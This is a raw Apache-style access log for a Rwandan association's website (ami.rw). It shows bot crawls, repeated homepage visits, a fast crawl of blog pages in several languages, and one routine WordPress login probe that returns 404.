40.77.178.48 - - [15/Sep/2025:23:05:48 +0200] "GET /js/bootstrap/bootstrap.min.js HTTP/1.1" 200 51039 "https://ami.rw/mission.php" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/136.0.0.0 Safari/537.36"
40.77.178.48 - - [15/Sep/2025:23:05:48 +0200] "GET /js/jquery/jquery-2.2.4.min.js HTTP/1.1" 200 85578 "https://ami.rw/mission.php" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/136.0.0.0 Safari/537.36"
40.77.178.48 - - [15/Sep/2025:23:05:41 +0200] "GET /js/plugins/plugins.js HTTP/1.1" 200 367229 "https://ami.rw/mission.php" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/136.0.0.0 Safari/537.36"
2.189.5.118 - - [15/Sep/2025:23:06:20 +0200] "GET / HTTP/1.1" 200 44657 "-" "Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG SM-T550 Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/3.3 Chrome/38.0.2125.102 Safari/537.36"
197.243.3.197 - - [15/Sep/2025:23:14:12 +0200] "GET / HTTP/1.1" 200 44657 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
2.189.5.142 - - [15/Sep/2025:23:25:39 +0200] "GET / HTTP/1.1" 200 44657 "-" "Mozilla/5.0 (Android 4.4; Mobile; rv:41.0) Gecko/41.0 Firefox/41.0"
2.189.5.142 - - [15/Sep/2025:23:26:50 +0200] "GET / HTTP/1.1" 200 44657 "-" "Mozilla/5.0 (X11; CrOS x86_64 8172.45.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.64 Safari/537.36"
2.189.5.162 - - [15/Sep/2025:23:26:50 +0200] "GET / HTTP/1.1" 200 44657 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13.6; rv:109.0) Gecko/20100101 Firefox/118.0"
2.189.5.162 - - [15/Sep/2025:23:28:33 +0200] "GET / HTTP/1.1" 200 44657 "-" "Mozilla/5.0 (iPad; CPU OS 13_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) FxiOS/118.0 Mobile/15E148 Safari/605.1.15"
197.243.3.197 - - [15/Sep/2025:23:29:47 +0200] "GET / HTTP/1.1" 200 44657 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
84.17.58.193 - - [15/Sep/2025:23:36:45 +0200] "GET /wp-login.php HTTP/1.1" 404 16 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:101.0) Gecko/20100101 Firefox/101.0"
84.17.58.193 - - [15/Sep/2025:23:36:45 +0200] "POST /wp-login.php HTTP/1.1" 404 16 "https://ami.rw/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:101.0) Gecko/20100101 Firefox/101.0"
84.17.58.193 - - [15/Sep/2025:23:36:45 +0200] "GET /wp-admin/ HTTP/1.1" 500 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:101.0) Gecko/20100101 Firefox/101.0"
2.189.5.118 - - [15/Sep/2025:23:37:34 +0200] "GET / HTTP/1.1" 200 44657 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 12_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 Mobile/15E148 Safari/604.1"
197.243.3.197 - - [15/Sep/2025:23:45:04 +0200] "GET / HTTP/1.1" 200 44657 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
2.189.5.142 - - [15/Sep/2025:23:52:10 +0200] "GET / HTTP/1.1" 200 44657 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:109.0) Gecko/20100101 Firefox/118.0"
2.189.5.162 - - [15/Sep/2025:23:54:21 +0200] "GET / HTTP/1.1" 200 44657 "-" "Mozilla/5.0 (iPad; CPU OS 13_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) FxiOS/118.0 Mobile/15E148 Safari/605.1.15"
197.243.3.197 - - [15/Sep/2025:23:54:27 +0200] "GET / HTTP/1.1" 200 44657 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
2.189.5.142 - - [16/Sep/2025:00:04:15 +0200] "GET / HTTP/1.1" 200 44657 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246"
2.189.5.162 - - [16/Sep/2025:00:04:15 +0200] "GET / HTTP/1.1" 200 44657 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0"
197.243.3.197 - - [16/Sep/2025:00:04:18 +0200] "GET / HTTP/1.1" 200 44657 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
2.189.5.118 - - [16/Sep/2025:00:08:33 +0200] "GET / HTTP/1.1" 200 44657 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:115.0) Gecko/20100101 Firefox/115.0"
197.243.3.197 - - [16/Sep/2025:00:14:09 +0200] "GET / HTTP/1.1" 200 44657 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
2.189.5.142 - - [16/Sep/2025:00:18:07 +0200] "GET / HTTP/1.1" 200 44657 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0"
2.189.5.162 - - [16/Sep/2025:00:19:45 +0200] "GET / HTTP/1.1" 200 44657 "-" "Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG SM-T550 Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/3.3 Chrome/38.0.2125.102 Safari/537.36"
197.243.3.197 - - [16/Sep/2025:00:28:48 +0200] "GET / HTTP/1.1" 200 44657 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
2.189.5.118 - - [16/Sep/2025:00:38:53 +0200] "GET / HTTP/1.1" 200 44657 "-" "Mozilla/5.0 (iPhone14,3; U; CPU iPhone OS 15_0 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/19A346 Safari/602.1"
2.189.5.142 - - [16/Sep/2025:00:42:38 +0200] "GET / HTTP/1.1" 200 44657 "-" "Mozilla/5.0 (iPod touch; CPU iPhone OS 13_6 like Mac OS X) AppleWebKit/604.5.6 (KHTML, like Gecko) FxiOS/118.0 Mobile/15E148 Safari/605.1.15"
2.189.5.162 - - [16/Sep/2025:00:42:38 +0200] "GET / HTTP/1.1" 200 44657 "-" "Mozilla/5.0 (X11; Linux i686; rv:115.0) Gecko/20100101 Firefox/115.0"
197.243.3.197 - - [16/Sep/2025:00:43:01 +0200] "GET / HTTP/1.1" 200 44657 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
2.189.5.142 - - [16/Sep/2025:00:43:22 +0200] "GET / HTTP/1.1" 200 44657 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:115.0) Gecko/20100101 Firefox/115.0"
2.189.5.162 - - [16/Sep/2025:00:44:27 +0200] "GET / HTTP/1.1" 200 44657 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:109.0) Gecko/20100101 Firefox/118.0"
66.249.66.5 - - [16/Sep/2025:00:57:15 +0200] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.163 - - [16/Sep/2025:00:57:32 +0200] "GET / HTTP/1.1" 200 44657 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
197.243.3.197 - - [16/Sep/2025:00:57:45 +0200] "GET / HTTP/1.1" 200 44657 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
66.249.66.66 - - [16/Sep/2025:00:57:47 +0200] "GET /favicon.ico HTTP/1.1" 404 - "-" "Googlebot-Image/1.0"
114.119.143.225 - - [16/Sep/2025:00:58:45 +0200] "GET /blog-detail.php?title=kigali:-ami-en-collaboration-avec-cejp-rwanda-a-organis%C3%A9-un-atelier-de-r%C3%A9flexion-sur-gbv HTTP/1.1" 200 20370 "https://ami.rw/" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
66.249.66.166 - - [16/Sep/2025:00:58:52 +0200] "GET / HTTP/1.1" 200 44657 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
197.243.3.197 - - [16/Sep/2025:01:06:13 +0200] "GET / HTTP/1.1" 200 44657 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
2.189.5.142 - - [16/Sep/2025:01:08:48 +0200] "GET / HTTP/1.1" 200 44657 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:10.0) Gecko/20100101 Firefox/10.0"
2.189.5.162 - - [16/Sep/2025:01:08:48 +0200] "GET / HTTP/1.1" 200 44657 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246"
40.77.167.38 - - [16/Sep/2025:01:09:37 +0200] "GET /personnel/ HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
2.189.5.118 - - [16/Sep/2025:01:09:56 +0200] "GET / HTTP/1.1" 200 44657 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246"
34.174.248.16 - - [16/Sep/2025:01:14:37 +0200] "GET / HTTP/1.1" 200 44657 "https://google.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
34.174.248.16 - - [16/Sep/2025:01:14:38 +0200] "GET /psycho_socio-economic_framework.php HTTP/1.1" 200 16219 "https://google.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
34.174.248.16 - - [16/Sep/2025:01:14:38 +0200] "GET /mode_de_travail.php HTTP/1.1" 200 16458 "https://google.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
34.174.248.16 - - [16/Sep/2025:01:14:38 +0200] "GET /approches.php HTTP/1.1" 200 17869 "https://google.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
34.174.248.16 - - [16/Sep/2025:01:14:39 +0200] "GET /groupes_cibles.php HTTP/1.1" 200 18301 "https://google.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
34.174.248.16 - - [16/Sep/2025:01:14:39 +0200] "GET /publications.php HTTP/1.1" 200 17189 "https://google.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
34.174.248.16 - - [16/Sep/2025:01:14:39 +0200] "GET /blog-detail.php?title=nyaruguru:-l%E2%80%99equipe-de-visiteurs-des-%C3%A9tudiantes-et-%C3%A9tudiants-des-trois-%C3%A9coles-belges-ont-appr%C3%A9ci%C3%A9-les-activit%C3%A9s-des-groupes-d%E2%80%99amataba- HTTP/1.1" 200 20924 "https://google.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
34.174.248.16 - - [16/Sep/2025:01:14:39 +0200] "GET /en/index.php HTTP/1.1" 200 41763 "https://google.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
34.174.248.16 - - [16/Sep/2025:01:14:39 +0200] "GET /blog-detail.php?title=dans-un-delai-de-six-mois,-le-dialogue-curatif-permet-%EF%BF%BD-98-familles-de-se-reconcilier HTTP/1.1" 200 23 "https://google.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
34.174.248.16 - - [16/Sep/2025:01:14:39 +0200] "GET /ubuntu.php HTTP/1.1" 200 23850 "https://google.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
34.174.248.16 - - [16/Sep/2025:01:14:39 +0200] "GET /domaine_de_Travail.php HTTP/1.1" 200 16000 "https://google.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
34.174.248.16 - - [16/Sep/2025:01:14:39 +0200] "GET /team.php HTTP/1.1" 200 31222 "https://google.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
34.174.248.16 - - [16/Sep/2025:01:14:39 +0200] "GET /structure_organisationelle.php HTTP/1.1" 200 15694 "https://google.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
34.174.248.16 - - [16/Sep/2025:01:14:39 +0200] "GET /education_a_la_paix.php HTTP/1.1" 200 15436 "https://google.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
34.174.248.16 - - [16/Sep/2025:01:14:39 +0200] "GET /photo.php HTTP/1.1" 200 49805 "https://google.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
34.174.248.16 - - [16/Sep/2025:01:14:39 +0200] "GET /documentary_film.php HTTP/1.1" 200 23124 "https://google.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
34.174.248.16 - - [16/Sep/2025:01:14:39 +0200] "GET /mission.php HTTP/1.1" 200 16101 "https://google.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
34.174.248.16 - - [16/Sep/2025:01:14:39 +0200] "GET /historique.php HTTP/1.1" 200 16354 "https://google.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
34.174.248.16 - - [16/Sep/2025:01:14:40 +0200] "GET /blog-detail.php?title=nyaruguru/nyagisozi:-les-enseignants-de-cours-d%27histoire-au-sein-des-%C3%A9coles-secondaires-dans-le-royaume-de-belgique-ont-appr%C3%A9ci%C3%A9-les-activit%C3%A9s-de-groupe-amataba HTTP/1.1" 200 23 "https://google.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
34.174.248.16 - - [16/Sep/2025:01:14:40 +0200] "GET /blog-detail.php?title=entre-rescapes-et-bourreaux-la-confiance-se-retablit HTTP/1.1" 200 25240 "https://google.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
34.174.248.16 - - [16/Sep/2025:01:14:40 +0200] "GET /blog-detail.php?title=nyaruguru%C2%A0:-les-autorit%C3%A9s-de-base-ont-appr%C3%A9ci%C3%A9-la-politique-alternative-de-r%C3%A9solution-des-conflits HTTP/1.1" 200 20420 "https://google.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
34.174.248.16 - - [16/Sep/2025:01:14:40 +0200] "GET /blog-detail.php?title=huye:-ami-et-st-mary%E2%80%99s-hight-school-kiruhura-ont-c%C3%A9l%C3%A9br%C3%A9-la-journ%C3%A9e-internationale-de-la-paix-2024 HTTP/1.1" 200 19964 "https://google.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
34.174.248.16 - - [16/Sep/2025:01:14:40 +0200] "GET /blog-detail.php?title=nyaruguru%C2%A0:-ami-remercie%C2%A0les-autorit%C3%A9s-locales-pour-un-partenariat-exemplaire-et%C2%A0collaboration-exceptionnelle-dans-18-ans%C2%A0pass%C3%A9 HTTP/1.1" 200 23 "https://google.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
34.174.248.16 - - [16/Sep/2025:01:14:40 +0200] "GET /blog-detail.php?title=nyaruguru-murama:-ami-a-organis%C3%A9-une-%C3%A9mission-radiodiffus%C3%A9e-en-directe-sur-les-services HTTP/1.1" 200 23 "https://google.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
34.174.248.16 - - [16/Sep/2025:01:14:40 +0200] "GET /strengthening_citizen_participation_in_the_life_of_the_city.php HTTP/1.1" 200 16032 "https://google.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
34.174.248.16 - - [16/Sep/2025:01:14:40 +0200] "GET /blog-detail.php?title=huye-:-nyiraboshya-julienne-appr%EF%BF%BDcie-le-plaidoyer-que-l%EF%BF%BDassociation-modeste-et-innocent-lui-a-fait-apr%EF%BF%BDs-une-ex%EF%BF%BDcution-d%EF%BF%BDun-jugement-dont-elle-attendait-pendant-38-ans-- HTTP/1.1" 200 23 "https://google.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
34.174.248.16 - - [16/Sep/2025:01:14:40 +0200] "GET /index.html HTTP/1.1" 404 - "https://google.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
34.174.248.16 - - [16/Sep/2025:01:14:40 +0200] "GET /blog-detail.php?title=huye:-ami-forme-25-jeunes-sur-la-culture-de-la-paix HTTP/1.1" 200 23610 "https://google.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
34.174.248.16 - - [16/Sep/2025:01:14:40 +0200] "GET /blog-detail.php?title=t%C3%A9moignage-de-mukakabano-daphane-accompagn%C3%A9e-par-ami-dans-le-plaidoyer- HTTP/1.1" 200 27850 "https://google.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
34.174.248.16 - - [16/Sep/2025:01:14:40 +0200] "GET /blog-detail.php?title=nyanza-:-les-membres-des-amataba-des-jeunes-ont-appr%C3%A9ci%C3%A9-des-progr%C3%A8s-r%C3%A9alis%C3%A9s-dans-la-promotion-de-l%E2%80%99unit%C3%A9-et-de-la-r%C3%A9silience HTTP/1.1" 200 22850 "https://google.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
34.174.248.16 - - [16/Sep/2025:01:14:40 +0200] "GET /objectifs.php HTTP/1.1" 200 16697 "https://google.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
34.174.248.16 - - [16/Sep/2025:01:14:40 +0200] "GET /blog-detail.php?title=histoire-de-succ%C3%A8s-et-quelques-t%C3%A9moignages-des-b%C3%A9n%C3%A9ficiaires-de-l%E2%80%99ami- HTTP/1.1" 200 29732 "https://google.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
34.174.248.16 - - [16/Sep/2025:01:14:40 +0200] "GET /quelques_realization.php HTTP/1.1" 200 19065 "https://google.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
34.174.248.16 - - [16/Sep/2025:01:14:40 +0200] "GET /promotion_of_the_reconciliation_process_and_non_violent_conflict_resolution.php HTTP/1.1" 200 15976 "https://google.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
34.174.248.16 - - [16/Sep/2025:01:14:40 +0200] "GET /blog-detail.php?title=kigali:-ami-en-collaboration-avec-cejp-rwanda-a-organis%C3%A9-un-atelier-de-r%C3%A9flexion-sur-gbv HTTP/1.1" 200 20370 "https://google.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
34.174.248.16 - - [16/Sep/2025:01:14:40 +0200] "GET /kin/index.php HTTP/1.1" 200 73632 "https://google.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
34.174.248.16 - - [16/Sep/2025:01:14:40 +0200] "GET /index.php HTTP/1.1" 200 44657 "https://google.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
34.174.248.16 - - [16/Sep/2025:01:14:40 +0200] "GET /Circonscription_du_travail.php HTTP/1.1" 200 15715 "https://google.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
34.174.248.16 - - [16/Sep/2025:01:14:48 +0200] "GET /kin/blog-detail.php?title=karongi-abagize-uruhare-muri-jenoside-yakorewe-abatutsi-barashima-ibiganiro-bibategura-kubana-neza-n%E2%80%99abarokotse-jenoside- HTTP/1.1" 200 18646 "https://google.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
34.174.248.16 - - [16/Sep/2025:01:14:48 +0200] "GET /kin/blog-detail.php?title=nyanza:--ami-yifatanyije-nabaturage-gutangiza-ukwezi-kwahariwe-kuzirikana-ubumwe-nubudaheranwa-bwabanyarwanda-2024 HTTP/1.1" 200 19350 "https://google.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
34.174.248.16 - - [16/Sep/2025:01:14:48 +0200] "GET /kin/blog-detail.php?title=huye-rwaniro:-barishimira-uruhare-rwa-ami-mu-kubafasha-kubona-serivisi-nziza HTTP/1.1" 200 19209 "https://google.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
34.174.248.16 - - [16/Sep/2025:01:14:48 +0200] "GET /kin/education_a_la_paix.php HTTP/1.1" 200 14665 "https://google.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
34.174.248.16 - - [16/Sep/2025:01:14:48 +0200] "GET /en/team.php HTTP/1.1" 200 33056 "https://google.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
34.174.248.16 - - [16/Sep/2025:01:14:48 +0200] "GET /kin/blog-detail.php?title=huye:-abari-mu-kiruhuko-cyizabukuru-barishimira-intambwe-bagezeho-mu-mishinga-batewemo-inkunga-na-ami HTTP/1.1" 200 18056 "https://google.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
34.174.248.16 - - [16/Sep/2025:01:14:48 +0200] "GET /kin/blog-detail.php?title=huye:-ami-n%E2%80%99abiga-muri-st-marys-high-school-kiruhura-bizihije-umunsi-mupuzamahanga-wamahoro-2024 HTTP/1.1" 200 18431 "https://google.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
34.174.248.16 - - [16/Sep/2025:01:14:48 +0200] "GET /en/strengthening_citizen_participation_in_the_life_of_the_city.php HTTP/1.1" 200 15946 "https://google.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
34.174.248.16 - - [16/Sep/2025:01:14:48 +0200] "GET /en/groupes_cibles.php HTTP/1.1" 200 18274 "https://google.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
34.174.248.16 - - [16/Sep/2025:01:14:48 +0200] "GET /kin/promotion_of_the_reconciliation_process_and_non_violent_conflict_resolution.php HTTP/1.1" 200 14922 "https://google.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
34.174.248.16 - - [16/Sep/2025:01:14:48 +0200] "GET /kin/blog-detail.php?title=nyaruguru:-abanyeshuri-bo-mu-bubiligi-basuye-abari-mu-mataba-banakorana-ibikorwa-byimirimo-yamaboko HTTP/1.1" 200 19093 "https://google.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
34.174.248.16 - - [16/Sep/2025:01:14:48 +0200] "GET /en/blog-detail.php?title=xd HTTP/1.1" 200 16358 "https://google.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
34.174.248.16 - - [16/Sep/2025:01:14:48 +0200] "GET /kin/mission.php HTTP/1.1" 200 17215 "https://google.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
34.174.248.16 - - [16/Sep/2025:01:14:48 +0200] "GET /kin/blog-detail.php?title=huye:-abo-ami-yavanye-mu-muhanda-ikabigisha-imyuga-batangiye-kwiteza-imbere HTTP/1.1" 200 17137 "https://google.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
34.174.248.16 - - [16/Sep/2025:01:14:48 +0200] "GET /kin/blog-detail.php?title=nyaruguru:-imiryango-120-iri-mu-kanyamuneza-nyuma-yo-gufashwa-na-ami-kuva-mu-makimbirane- HTTP/1.1" 200 20787 "https://google.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
34.174.248.16 - - [16/Sep/2025:01:14:48 +0200] "GET /kin/team.php HTTP/1.1" 200 32045 "https://google.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
34.174.248.16 - - [16/Sep/2025:01:14:48 +0200] "GET /kin/blog-detail.php?title=kigali:-ami-yitabiriye-imurikabikorwa-ryimiryango-itari-iya-leta- HTTP/1.1" 200 18552 "https://google.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
34.174.248.16 - - [16/Sep/2025:01:14:48 +0200] "GET /en/Circonscription_du_travail.php HTTP/1.1" 200 15560 "https://google.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
